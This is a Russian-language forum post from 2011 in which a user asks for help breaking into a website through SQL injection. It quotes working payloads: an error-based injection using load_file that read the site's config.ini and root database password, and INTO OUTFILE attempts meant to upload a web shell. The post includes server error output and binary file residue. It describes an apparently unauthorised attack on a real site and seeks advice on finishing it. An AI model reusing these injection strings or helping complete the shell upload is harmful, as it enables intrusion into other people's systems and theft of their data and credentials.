23.11.2011, 15:15
|
|
Познающий
Регистрация: 30.10.2011
Сообщений: 37
С нами:
7650326
Репутация:
1
|
|
Прошу помощи!
Как всегда начну с фразы: "Уважаемые знатоки!"
Есть сайт:
1)file_priv=y
2)mq=off
3) есть /test.php
3) Доступ 4х администраторов в админку есть, доступ в админку www.site.ru/cms) - так он не пускает но если через www.site.ru/index.php/cms тогда пускает но не выполняются скрипты.
4) прочитан config.ini есть пароль root к базе. Но путь до самой базы не известен.
Теперь самое интересное:
config.ini прочитан так:
index/***/id/*21'+or+1+group+by+concat(mid(load_file(0xздес ьхеш),50,163),floor(rand(0)*2))+having+min(0)+ or+1+--+
запрос на запись делаем так: /image/*****/id/*53+and+(select+'+into+outfile+')+!=1
результат - ошибка но через пару часов при
/image/*****/id/*53 без инъекта появляется следущее:
яШяа�JFIF���HHяб�4ExifII*�����������b����j(� ���1���r2���Ћi‡��¤шЂь �'Ђь �'Adobe Photoshop CS2 Windows2011:07:05 16:16:46�†’��Ъ� ��яя� ��Ж� ��zLEAD Technologies Inc. V1.01����������F�����N�(��������V�����Ц�H�H�яШ а�JFIF��HHян�Adobe_CM�яо�AdobedЂ�яЫ„���� �� ��� ���������������������������������������������������� �� � ����������������������������������������������������������яА��c ��"������яЭ� яД�?���������������� ������������������ ����������������3�����!�1�AQa�"qЃ2��‘Ў
и т.д...
ВНИМАНИЕ ВОПРОС!
На сколько высока вероятность то что into outfile не получится (доходчиво: шелл не зальется?)
P.S. возможно не правильный запрос но если запрос сделать так
/image/*****/id/*53+and+'select+'+into+outfile+'+!=1'
то ошибка такова:
Invalid query: File ' !=1' already exists
Спасибо за внимание надеюсь на коментарии, может у кого-то похожая ситуация была.
|
|
|